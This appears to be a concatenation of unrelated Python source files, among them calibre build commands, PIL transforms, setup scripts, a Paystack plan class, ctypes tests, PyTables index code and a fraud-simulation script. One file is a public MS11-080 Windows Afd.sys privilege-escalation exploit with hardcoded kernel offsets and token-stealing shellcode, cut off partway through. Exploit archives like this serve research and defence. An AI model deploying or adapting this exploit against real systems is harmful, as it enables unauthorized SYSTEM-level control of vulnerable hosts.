sub_commands = ['upload_to_server']
def run(self, opts):
subprocess.check_call('rm -rf build/* dist/*', shell=True)
class Publish(Command):
description = 'Publish a new calibre release'
sub_commands = ['stage1', 'stage2', 'stage3', 'stage4', 'stage5', ]
class Manual(Command):
description='''Build the User Manual '''
def run(self, opts):
cwd = os.path.abspath(os.getcwd())
os.chdir(os.path.join(self.SRC, '..', 'manual'))
try:
for d in ('.build', 'cli'):
if os.path.exists(d):
shutil.rmtree(d)
os.makedirs(d)
if not os.path.exists('.build'+os.sep+'html'):
os.makedirs('.build'+os.sep+'html')
os.environ['__appname__'] = __appname__
os.environ['__version__'] = __version__
subprocess.check_call(['sphinx-build', '-b', 'html', '-t', 'online',
'-d', '.build/doctrees', '.', '.build/html'])
subprocess.check_call(['sphinx-build', '-b', 'myepub', '-d',
'.build/doctrees', '.', '.build/epub'])
subprocess.check_call(['sphinx-build', '-b', 'mylatex', '-d',
'.build/doctrees', '.', '.build/latex'])
pwd = os.getcwdu()
os.chdir('.build/latex')
subprocess.check_call(['make', 'all-pdf'], stdout=open(os.devnull,
'wb'))
os.chdir(pwd)
epub_dest = self.j('.build', 'html', 'calibre.epub')
pdf_dest = self.j('.build', 'html', 'calibre.pdf')
shutil.copyfile(self.j('.build', 'epub', 'calibre.epub'), epub_dest)
shutil.copyfile(self.j('.build', 'latex', 'calibre.pdf'), pdf_dest)
subprocess.check_call(['ebook-convert', epub_dest,
epub_dest.rpartition('.')[0] + '.azw3',
'--page-breaks-before=/', '--disable-font-rescaling',
'--chapter=/'])
finally:
os.chdir(cwd)
def clean(self):
path = os.path.join(self.SRC, 'calibre', 'manual', '.build')
if os.path.exists(path):
shutil.rmtree(path)
class TagRelease(Command):
description = 'Tag a new release in bzr'
def run(self, opts):
self.info('Tagging release')
subprocess.check_call(('bzr tag '+__version__).split())
subprocess.check_call('bzr commit --unchanged -m'.split() + ['IGN:Tag release'])

SecWiki/windows-kernel-exploits | MS11-080/CVE-2011-2005.py | Python | mit | 12,217 | 0.014161
################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: ryujin@offsec.com - Matteo Memelli ########
######### Spaghetti & Pwnsauce ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com ########
######### ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ########
######### for helping out! ########
######### ########
######### To my Master Shifu muts: ########
######### "So that's it, I just need inner peace?" ;) ########
######### ########
######### Exploit tested on the following 32bits systems: ########
######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng ########
################################################################################
from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER,
c_char, c_short, c_ushort, c_int, c_uint, c_ulong,
c_void_p, c_long, c_char_p)
from ctypes.wintypes import HANDLE, DWORD
import socket, time, os, struct, sys
from optparse import OptionParser
usage = "%prog -O TARGET_OS"
parser = OptionParser(usage=usage)
parser.add_option("-O", "--target-os", type="string",
action="store", dest="target_os",
help="Target OS. Accepted values: XP, 2K3")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['XP','2K3']:
parser.print_help()
sys.exit()
OS = OS.upper()
kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi
def findSysBase(drvname=None):
ARRAY_SIZE = 1024
myarray = c_ulong * ARRAY_SIZE
lpImageBase = myarray()
cb = c_int(1024)
lpcbNeeded = c_long()
drivername_size = c_long()
drivername_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
for baseaddy in lpImageBase:
drivername = c_char_p("\x00"*drivername_size.value)
if baseaddy:
Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
drivername_size.value)
if drvname:
if drivername.value.lower() == drvname:
print "[+] Retrieving %s info..." % drvname
print "[+] %s base address: %s" % (drvname, hex(baseaddy))
return baseaddy
else:
if drivername.value.lower().find("krnl") !=-1:
print "[+] Retrieving Kernel info..."
print "[+] Kernel version:", drivername.value
print "[+] Kernel base address: %s" % hex(baseaddy)
return (baseaddy, drivername.value)
return None
print "[>] MS11-080 Privilege Escalation Exploit"
print "[>] Matteo Memelli - ryujin@offsec.com"
print "[>] Release Date 28/11/2011"
WSAGetLastError = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype = c_int
SOCKET = c_int
WSASocket = windll.Ws2_32.WSASocketA
WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype = SOCKET
closesocket = windll.Ws2_32.closesocket
closesocket.argtypes = (SOCKET,)
closesocket.restype = c_int
connect = windll.Ws2_32.connect
connect.argtypes = (SOCKET, c_void_p, c_int)
connect.restype = c_int
class sockaddr_in(Structure):
_fields_ = [
("sin_family", c_short),
("sin_port", c_ushort),
("sin_addr", c_ulong),
("sin_zero", c_char * 8),
]
## Create our deviceiocontrol socket handle
client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
None, 0, 0)
if client == ~0:
raise OSError, "WSASocket: %s" % (WSAGetLastError(),)
try:
addr = sockaddr_in()
addr.sin_family = socket.AF_INET
addr.sin_port = socket.htons(4455)
addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1
## We need to connect to a closed port, socket state must be CONNECTING
connect(client, byref(addr), sizeof(addr))
except:
closesocket(client)
raise
baseadd = c_int(0x1001)
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x00000040
Zerobits = c_int(0)
RegionSize = c_int(0x1000)
written = c_int(0)
## This will trigger the path to AfdRestartJoin
irpstuff = ("\x41\x41\x41\x41\x42\x42\x42\x42"
"\x00\x00\x00\x00\x44\x44\x44\x44"
"\x01\x00\x00\x00"
"\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231)
## Allocate space for the input buffer
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
# Copy input buffer to it
kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written))
startPage = c_int(0x00020000)
kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written))
################################# KERNEL INFO ##################################
lpDriver = c_char_p()
lpPath = c_char_p()
lpDrvAddress = c_long()
(krnlbase, kernelver) = findSysBase()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += krnlbase
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
halbase = findSysBase("hal.dll")
## WinXP SP3
if OS == "XP":
HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3
HalpSetSystemInformation = halbase+0x19436 # Offset for XPSP3
## Win2k3 SP2
else:
HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3
HalpSetSystemInformation = halbase+0x21c60 # Offset for WIN2K3
print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)
################################# EXPLOITATION #################################
shellcode_address_dep = 0x0002071e
shellcode_address_nodep = 0x000207b8
padding = "\x90"*2
HalDispatchTable0x4 = HalDispatchTable + 0x4
HalDispatchTable0x8 = HalDispatchTable + 0x8
## tokenbkaddr = 0x00020900
if OS == "XP":
_KPROCESS = "\x44"
_TOKEN = "\xc8"
_UPID = "\x84"
_APLINKS = "\x88"
else:
_KPROCESS = "\x38"
_TOKEN = "\xd8"
_UPID = "\x94"
_APLINKS = "\x98"
restore_ptrs = "\x31\xc0" + \
"\xb8" + struct.pack("L", HalpSetSystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x8) + \
"\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x4)
tokenstealing = "\x52" +\
"\x53" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\xc8" +\
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
"\x89\x1d\x00\x09\x02\x00" +\
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
"\x81\xb8" + _UPID + "\x00\x00

Faggioni/powerlab | setup.py | Python | mit | 405 | 0.004938
from setuptools import setup
setup(name='powerlab',
version='0.1',
description='Power System Tools',
url='https://github.com/Faggioni/powerlab',
author='Miguel Faggioni',
author_email='miguelfaggioni@gmail.com',
license='MIT',
packages=['powerlab'],
install_requires=[
'numpy',
],
entry_points= {
},
zip_safe=False)

mjirik/dicom2fem | setup.py | Python | bsd-3-clause | 3,561 | 0.000842
from setuptools import setup, find_packages # Always prefer setuptools over distutils
from os import path
here = path.abspath(path.dirname(__file__))
setup(
name='dicom2fem',
description='Generation of finite element meshes from DICOM images',
long_description="Generation of finite element meshes using computed " +
"tomography scans. Segmentation is based on the graph cut algorithm.",
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# http://packaging.python.org/en/latest/tutorial.html#version
version='1.1.13',
url='https://github.com/vlukes/dicom2fem',
author='Vladimir Lukes',
author_email='vlukes@kme.zcu.cz',
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering :: Bio-Informatics',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: BSD License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
# 'Programming Language :: Python :: 2',
# 'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
# 'Programming Language :: Python :: 3',
# 'Programming Language :: Python :: 3.2',
# 'Programming Language :: Python :: 3.3',
# 'Programming Language :: Python :: 3.4',
],
# What does your project relate to?
keywords='fem dicom',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['dist', 'docs', 'tests*']),
# List run-time dependencies here. These will be installed by pip when your
# project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/technical.html#install-requires-vs-requirements-files
install_requires=[
# 'numpy', 'imcut'
],
# dependency_links=['https://github.com/mjirik/gco_python'],
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
# package_data={
# 'sample': ['package_data.dat'],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages.
# see http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
# entry_points={
# 'console_scripts': [
# 'sample=sample:main',
# ],
# },
)

DanteOnline/free-art | venv/lib/python3.4/site-packages/PIL/ImageTransform.py | Python | gpl-3.0 | 2,878 | 0
#
# The Python Imaging Library.
# $Id$
#
# transform wrappers
#
# History:
# 2002-04-08 fl Created
#
# Copyright (c) 2002 by Secret Labs AB
# Copyright (c) 2002 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from PIL import Image
class Transform(Image.ImageTransformHandler):
def __init__(self, data):
self.data = data
def getdata(self):
return self.method, self.data
def transform(self, size, image, **options):
# can be overridden
method, data = self.getdata()
return image.transform(size, method, data, **options)
class AffineTransform(Transform):
"""
Define an affine image transform.
This function takes a 6-tuple (a, b, c, d, e, f) which contain the first
two rows from an affine transform matrix. For each pixel (x, y) in the
output image, the new value is taken from a position (a x + b y + c,
d x + e y + f) in the input image, rounded to nearest pixel.
This function can be used to scale, translate, rotate, and shear the
original image.
@def AffineTransform(matrix)
@param matrix A 6-tuple (a, b, c, d, e, f) containing the first two rows
from an affine transform matrix.
@see Image#Image.transform
"""
method = Image.AFFINE
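# Illustrative usage only (assumes an already-opened Image "im"): shift the
# visible content 10 px right and 20 px down; the matrix maps output pixels
# back to input positions, so the offsets are negated:
#   im.transform(im.size, AffineTransform((1, 0, -10, 0, 1, -20)))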
class ExtentTransform(Transform):
"""
Define a transform to extract a subregion from an image.
Maps a rectangle (defined by two corners) from the image to a rectangle of
the given size. The resulting image will contain data sampled from between
the corners, such that (x0, y0) in the input image will end up at (0,0) in
the output image, and (x1, y1) at size.
This method can be used to crop, stretch, shrink, or mirror an arbitrary
rectangle in the current image. It is slightly slower than crop, but about
as fast as a corresponding resize operation.
@def ExtentTransform(bbox)
@param bbox A 4-tuple (x0, y0, x1, y1) which specifies two points in the
input image's coordinate system.
@see Image#Image.transform
"""
method = Image.EXTENT
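# Illustrative usage only (assumes an already-opened Image "im"): crop the
# top-left 64x64 region and scale it to a 128x128 output:
#   im.transform((128, 128), ExtentTransform((0, 0, 64, 64)))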
class QuadTransform(Transform):
"""
Define a quad image transform.
Maps a quadrilateral (a region defined by four corners) from the image to a
rectangle of the given size.
@def QuadTransform(xy)
@param xy An 8-tuple (x0, y0, x1, y1, x2, y2, x3, y3) which contains the
upper left, lower left, lower right, and upper right corner of the
source quadrilateral.
@see Image#Image.transform
"""
method = Image.QUAD
class MeshTransform(Transform):
"""
Define a mesh image transform. A mesh transform consists of one or more
individual quad transforms.
@def MeshTransform(data)
@param data A list of (bbox, quad) tuples.
@see Image#Image.transform
"""
method = Image.MESH
# End of file

Chibuzor-IN/python-paystack | python_paystack/objects/plans.py | Python | mit | 1,566 | 0.001916
'''
plans.py
'''
from forex_python.converter import CurrencyCodes
from .base import Base
class Plan(Base):
'''
Plan class for making payment plans
'''
interval = None
name = None
amount = None
plan_code = None
currency = None
id = None
send_sms = True
send_invoices = True
description = None
__interval_values = ('hourly', 'daily', 'weekly', 'monthly', 'annually')
def __init__(self, name, interval, amount, currency='NGN', plan_code=None,
id=None, send_sms=None, send_invoices=None, description=None):
super().__init__()
#Check if currency supplied is valid
if not CurrencyCodes().get_symbol(currency.upper()):
raise ValueError("Invalid currency supplied")
if interval.lower() not in self.__interval_values:
raise ValueError("Interval should be one of 'hourly',"
"'daily', 'weekly', 'monthly','annually'"
)
try:
amount = int(amount)
except ValueError:
raise ValueError("Invalid amount")
else:
self.interval = interval.lower()
self.name = name
self.amount = amount
self.currency = currency
self.plan_code = plan_code
self.id = id
self.send_sms = send_sms
self.send_invoices = send_invoices
self.description = description
def __str__(self):
return "%s plan" % self.name
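# Illustrative usage only (the values are made up):
#   plan = Plan('Premium', 'monthly', 5000, currency='NGN')
#   str(plan) -> 'Premium plan'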

SerSamgy/PhotoLoader | manage.py | Python | mit | 254 | 0
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "PhotoLoader.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)

XanderXAJ/mastercardConvert | mastercardConvert.py | Python | gpl-3.0 | 2,462 | 0.004874
#!/usr/bin/env python
import argparse
import logging
from functools import partial
from domain import date, transaction
# Parse command line arguments
parser = argparse.ArgumentParser(description="Convert currency using MasterCard exchange rates",
epilog='If no date is specified, the most recent date with rates is used.')
parser.add_argument('from_quantity', type=float, help='Quantity of from_currency used in transaction')
parser.add_argument('from_currency', type=str.upper,
help='The currency to convert from, i.e. the transaction currency, e.g. GBP, USD, JPY')
parser.add_argument('to_currency', type=str.upper,
help='The currency to convert to, i.e. the card currency, e.g. GBP, USD, JPY')
parser.add_argument('-d', '--date',
help='Day the exchange was made in format YYYY-MM-DD. Only today and yesterday appear to be supported by MasterCard. Defaults to most recent day with rates.')
parser.add_argument('--log_level', help='Set logging level', default='WARNING',
type=str.upper,
choices=['CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG'])
parser.add_argument('-t', '--today', action='store_true',
help='Use today\'s exchange rates. This may error if today\'s rates have not been uploaded')
parser.add_argument('-y', '--yesterday', action='count', default=0,
help='Uses yesterday\'s exchange rates. Repeat to go further back in time')
args = parser.parse_args()
logging.basicConfig(level=logging.getLevelName(args.log_level))
logging.debug(args)
# Figure out which date to use
if args.date is not None: # User-specified date
settle = partial(transaction.settle, exchange_rate_date=date.parse(args.date))
elif args.today: # Today
settle = partial(transaction.settle, exchange_rate_date=date.date_today())
elif args.yesterday > 0: # Yesterday (note that yesterday can be specified multiple times)
settle = partial(transaction.settle, exchange_rate_date=date.date_n_days_ago(args.yesterday))
else: # Use most recent date with published rates, discover date from initial MasterCard call
settle = transaction.settle_latest
# Get card amount from MasterCard
transaction = settle(
transaction_amount=args.from_quantity,
transaction_currency=args.from_currency,
card_currency=args.to_currency,
)
# Output conversion
print(transaction['card_amount'])

mRokita/DPLib | dplib/parse.py | Python | agpl-3.0 | 3,545 | 0.005079
# DPLib - Asynchronous bot framework for Digital Paint: Paintball 2 servers
# Copyright (C) 2017 Michał Rokita
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
A module for parsing DP data
"""
CHAR_TAB = ['\0', '-', '-', '-', '_', '*', 't', '.', 'N', '-', '\n', '#', '.', '>', '*', '*',
'[', ']', '@', '@', '@', '@', '@', '@', '<', '>', '.', '-', '*', '-', '-', '-',
' ', '!', '\"', '#', '$', '%', '&', '\'', '(', ')', '*', '+', ',', '-', '.', '/',
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', ';', '<', '=', '>', '?',
'@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O',
'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\', ']', '^', '_',
'`', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '{', '|', '}', '~', '<',
'(', '=', ')', '^', '!', 'O', 'U', 'I', 'C', 'C', 'R', '#', '?', '>', '*', '*',
'[', ']', '@', '@', '@', '@', '@', '@', '<', '>', '*', 'X', '*', '-', '-', '-',
' ', '!', '\"', '#', '$', '%', '&', '\'', '(', ')', '*', '+', ',', '-', '.', '/',
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', ';', '<', '=', '>', '?',
'@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O',
'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\', ']', '^', '_',
'`', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O',
'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '{', '|', '}', '~', '<']
def decode_ingame_text(text):
"""
Removes special chars from ingame messages/nicks
:param text: Text to decode
:return: Decoded text
"""
cleaned_text = ""
skip_next = False
for i in text:
char_ascii = ord(i)
# 134-underline, 135-italic, 136-color
if char_ascii == 134 or char_ascii == 135 or char_ascii == 136 or skip_next: # Remove underline, italic symbols
if char_ascii == 136:
skip_next = True
else:
skip_next = False
else:
cleaned_text = cleaned_text + CHAR_TAB[char_ascii]
skip_next = False
return cleaned_text
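# Illustrative example: chr(136) starts a colour code, so it is dropped together
# with the byte that follows it:
#   decode_ingame_text('Hi ' + chr(136) + '4there') -> 'Hi there'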
def render_text(text):
"""
Renders some text with formatting to a DP message.
Replaces {C} with color char (ASCII 136), {U} with underline (ASCII 134) and {I} with italic (ASCII 135)
:param text: Text to render
:type text: str
:return: DP message
:rtype: str
"""
return text.format(C=chr(136), U=chr(134), I=chr(135))
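# Illustrative example (chr(134) is '\x86'):
#   render_text('Welcome {U}back{U}!') -> 'Welcome \x86back\x86!'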
def escape_braces(string):
"""
Escapes braces, use for user-input in :func:`render_text`
:param string: string to escape
:return: escaped string
"""
return string.replace('{', '{{').replace('}', '}}')

ztane/zsos | userland/lib/python2.5/ctypes/test/test_slicing.py | Python | gpl-3.0 | 3,845 | 0.00156
import unittest
from ctypes import *
import _ctypes_test
class SlicesTestCase(unittest.TestCase):
def test_getslice_cint(self):
a = (c_int * 100)(*xrange(1100, 1200))
b = range(1100, 1200)
self.failUnlessEqual(a[0:2], b[0:2])
self.failUnlessEqual(len(a), len(b))
self.failUnlessEqual(a[5:7], b[5:7])
self.failUnlessEqual(a[-1], b[-1])
self.failUnlessEqual(a[:], b[:])
a[0:5] = range(5, 10)
self.failUnlessEqual(a[0:5], range(5, 10))
def test_setslice_cint(self):
a = (c_int * 100)(*xrange(1100, 1200))
b = range(1100, 1200)
a[32:47] = range(32, 47)
self.failUnlessEqual(a[32:47], range(32, 47))
from operator import setslice
# TypeError: int expected instead of str instance
self.assertRaises(TypeError, setslice, a, 0, 5, "abcde")
# TypeError: int expected instead of str instance
self.assertRaises(TypeError, setslice, a, 0, 5, ["a", "b", "c", "d", "e"])
# TypeError: int expected instead of float instance
self.assertRaises(TypeError, setslice, a, 0, 5, [1, 2, 3, 4, 3.14])
# ValueError: Can only assign sequence of same size
self.assertRaises(ValueError, setslice, a, 0, 5, range(32))
def test_char_ptr(self):
s = "abcdefghijklmnopqrstuvwxyz"
dll = CDLL(_ctypes_test.__file__)
dll.my_strdup.restype = POINTER(c_char)
dll.my_free.restype = None
res = dll.my_strdup(s)
self.failUnlessEqual(res[:len(s)], s)
import operator
self.assertRaises(TypeError, operator.setslice,
res, 0, 5, u"abcde")
dll.my_free(res)
dll.my_strdup.restype = POINTER(c_byte)
res = dll.my_strdup(s)
self.failUnlessEqual(res[:len(s)], range(ord("a"), ord("z")+1))
dll.my_free(res)
def test_char_ptr_with_free(self):
dll = CDLL(_ctypes_test.__file__)
s = "abcdefghijklmnopqrstuvwxyz"
class allocated_c_char_p(c_char_p):
pass
dll.my_free.restype = None
def errcheck(result, func, args):
retval = result.value
dll.my_free(result)
return retval
dll.my_strdup.restype = allocated_c_char_p
dll.my_strdup.errcheck = errcheck
try:
res = dll.my_strdup(s)
self.failUnlessEqual(res, s)
finally:
del dll.my_strdup.errcheck
def test_char_array(self):
s = "abcdefghijklmnopqrstuvwxyz\0"
p = (c_char * 27)(*s)
self.failUnlessEqual(p[:], s)
try:
c_wchar
except NameError:
pass
else:
def test_wchar_ptr(self):
s = u"abcdefghijklmnopqrstuvwxyz\0"
dll = CDLL(_ctypes_test.__file__)
dll.my_wcsdup.restype = POINTER(c_wchar)
dll.my_wcsdup.argtypes = POINTER(c_wchar),
dll.my_free.restype = None
res = dll.my_wcsdup(s)
self.failUnlessEqual(res[:len(s)], s)
import operator
self.assertRaises(TypeError, operator.setslice,
res, 0, 5, u"abcde")
dll.my_free(res)
if sizeof(c_wchar) == sizeof(c_short):
dll.my_wcsdup.restype = POINTER(c_short)
elif sizeof(c_wchar) == sizeof(c_int):
dll.my_wcsdup.restype = POINTER(c_int)
elif sizeof(c_wchar) == sizeof(c_long):
dll.my_wcsdup.restype = POINTER(c_long)
else:
return
res = dll.my_wcsdup(s)
self.failUnlessEqual(res[:len(s)-1], range(ord("a"), ord("z")+1))
dll.my_free(res)
################################################################
if __name__ == "__main__":
unittest.main()

avalentino/PyTables | tables/indexes.py | Python | bsd-3-clause | 5,884 | 0
"""Here is defined the IndexArray class."""
from bisect import bisect_left, bisect_right
from .node import NotLoggedMixin
from .carray import CArray
from .earray import EArray
from . import indexesextension
# Declarations for inheriting
class CacheArray(indexesextension.CacheArray, NotLoggedMixin, EArray):
"""Container for keeping index caches of 1st and 2nd level."""
# Class identifier.
_c_classid = 'CACHEARRAY'
class LastRowArray(indexesextension.LastRowArray, NotLoggedMixin, CArray):
"""Container for keeping sorted and indices values of last row of an
index."""
# Class identifier.
_c_classid = 'LASTROWARRAY'
class IndexArray(indexesextension.IndexArray, NotLoggedMixin, EArray):
"""Represent the index (sorted or reverse index) dataset in HDF5 file.
All NumPy typecodes are supported except for complex datatypes.
Parameters
----------
parentnode
The Index class from which this object will hang off.
.. versionchanged:: 3.0
Renamed from *parentNode* to *parentnode*.
name : str
The name of this node in its parent group.
atom
An Atom object representing the shape and type of the atomic objects to
be saved. Only scalar atoms are supported.
title
Sets a TITLE attribute on the array entity.
filters : Filters
An instance of the Filters class that provides information about the
desired I/O filters to be applied during the life of this object.
byteorder
        The byteorder of the data on-disk.
"""
# Class identifier.
_c_classid = 'INDEXARRAY'
@property
def chunksize(self):
"""The chunksize for this object."""
return self.chunkshape[1]
@property
def slicesize(self):
"""The slicesize for this object."""
return self.shape[1]
def __init__(self, parentnode, name,
atom=None, title="",
filters=None, byteorder=None):
"""Create an IndexArray instance."""
self._v_pathname = parentnode._g_join(name)
if atom is not None:
# The shape and chunkshape needs to be fixed here
if name == "sorted":
reduction = parentnode.reduction
shape = (0, parentnode.slicesize // reduction)
chunkshape = (1, parentnode.chunksize // reduction)
else:
shape = (0, parentnode.slicesize)
chunkshape = (1, parentnode.chunksize)
else:
# The shape and chunkshape will be read from disk later on
shape = None
chunkshape = None
super().__init__(
parentnode, name, atom, shape, title, filters,
chunkshape=chunkshape, byteorder=byteorder)
# This version of searchBin uses both ranges (1st level) and
# bounds (2nd level) caches. It uses a cache for boundary rows,
# but not for 'sorted' rows (this is only supported for the
# 'optimized' types).
def _search_bin(self, nrow, item):
item1, item2 = item
result1 = -1
result2 = -1
hi = self.shape[1]
ranges = self._v_parent.rvcache
boundscache = self.boundscache
# First, look at the beginning of the slice
begin = ranges[nrow, 0]
# Look for items at the beginning of sorted slices
if item1 <= begin:
result1 = 0
if item2 < begin:
result2 = 0
        if result1 >= 0 and result2 >= 0:
return (result1, result2)
# Then, look for items at the end of the sorted slice
end = ranges[nrow, 1]
if result1 < 0:
if item1 > end:
result1 = hi
if result2 < 0:
if item2 >= end:
result2 = hi
if result1 >= 0 and result2 >= 0:
return (result1, result2)
# Finally, do a lookup for item1 and item2 if they were not found
# Lookup in the middle of slice for item1
chunksize = self.chunksize # Number of elements/chunksize
nchunk = -1
# Try to get the bounds row from the LRU cache
nslot = boundscache.getslot(nrow)
if nslot >= 0:
# Cache hit. Use the row kept there.
bounds = boundscache.getitem(nslot)
else:
# No luck with cached data. Read the row and put it in the cache.
bounds = self._v_parent.bounds[nrow]
size = bounds.size * bounds.itemsize
boundscache.setitem(nrow, bounds, size)
if result1 < 0:
# Search the appropriate chunk in bounds cache
nchunk = bisect_left(bounds, item1)
chunk = self._read_sorted_slice(nrow, chunksize * nchunk,
chunksize * (nchunk + 1))
result1 = indexesextension._bisect_left(chunk, item1, chunksize)
result1 += chunksize * nchunk
# Lookup in the middle of slice for item2
if result2 < 0:
# Search the appropriate chunk in bounds cache
nchunk2 = bisect_right(bounds, item2)
if nchunk2 != nchunk:
chunk = self._read_sorted_slice(nrow, chunksize * nchunk2,
chunksize * (nchunk2 + 1))
result2 = indexesextension._bisect_right(chunk, item2, chunksize)
result2 += chunksize * nchunk2
return (result1, result2)
def __str__(self):
"""A compact representation of this class"""
return f"IndexArray(path={self._v_pathname})"
def __repr__(self):
"""A verbose representation of this class."""
return f"""{self}
atom = {self.atom!r}
shape = {self.shape}
nrows = {self.nrows}
chunksize = {self.chunksize}
slicesize = {self.slicesize}
byteorder = {self.byteorder!r}"""
|
lmzintgraf/MultiMAuS
|
experiments/run_multimaus.py
|
Python
|
mit
| 2,970 | 0.001684 |
from authenticators.simple_authenticators import RandomAuthenticator, \
HeuristicAuthenticator, OracleAuthenticator, NeverSecondAuthenticator, \
AlwaysSecondAuthenticator
from simulator import parameters
from simulator.transaction_model import TransactionModel
from experiments import rewards
import numpy as np
import matplotlib.pyplot as plt
from experiments import result_handling
def run_single():
# get the parameters for the simulation
params = parameters.get_default_parameters()
params['init_satisfaction'] = 0.9
# increase the probability of making another transaction
new_stay_prob = [0.8, 0.5]
print('changing stay prob from', params['stay_prob'], 'to', new_stay_prob)
params['stay_prob'] = new_stay_prob
plt.figure(figsize=(10, 5))
for a in ['random', 'oracle', 'never_second', 'heuristic', 'always_second']:
# the authenticator
authenticator = get_authenticator(a)
# initialise transaction model
model = TransactionModel(params, authenticator)
# run the simulation until termination
while not model.terminated:
model.step()
# get the collected data
agent_vars = model.log_collector.get_agent_vars_dataframe()
agent_vars.index = agent_vars.index.droplevel(1)
model_vars = model.log_collector.get_model_vars_dataframe()
# save the results
result_handling.save_results(model)
reward_fraud = rewards.money_lost_per_timestep(agent_vars)
reward_genuine = rewards.money_made_per_timestep(agent_vars)
monetary_rewards = rewards.monetary_reward_per_timestep(agent_vars)
true_satisfactions = rewards.satisfaction_per_timestep(model_vars)
# plt.subplot(1, 4, 1)
plt.ylabel('revenue (total)')
plt.plot(range(len(monetary_rewards)), np.cumsum(monetary_rewards), label=a)
plt.legend()
# plt.subplot(1, 4, 2)
# plt.ylabel('cumulative satisfaction')
# plt.plot(range(len(true_satisfactions)), np.cumsum(true_satisfactions), label=a)
#
# plt.subplot(1, 4, 3)
# plt.ylabel('revenue (money lost by fraud)')
# plt.plot(range(len(true_satisfactions)), np.cumsum(true_satisfactions), label=a)
#
# plt.subplot(1, 4, 4)
# plt.ylabel('revenue (money gained by genuine transactions)')
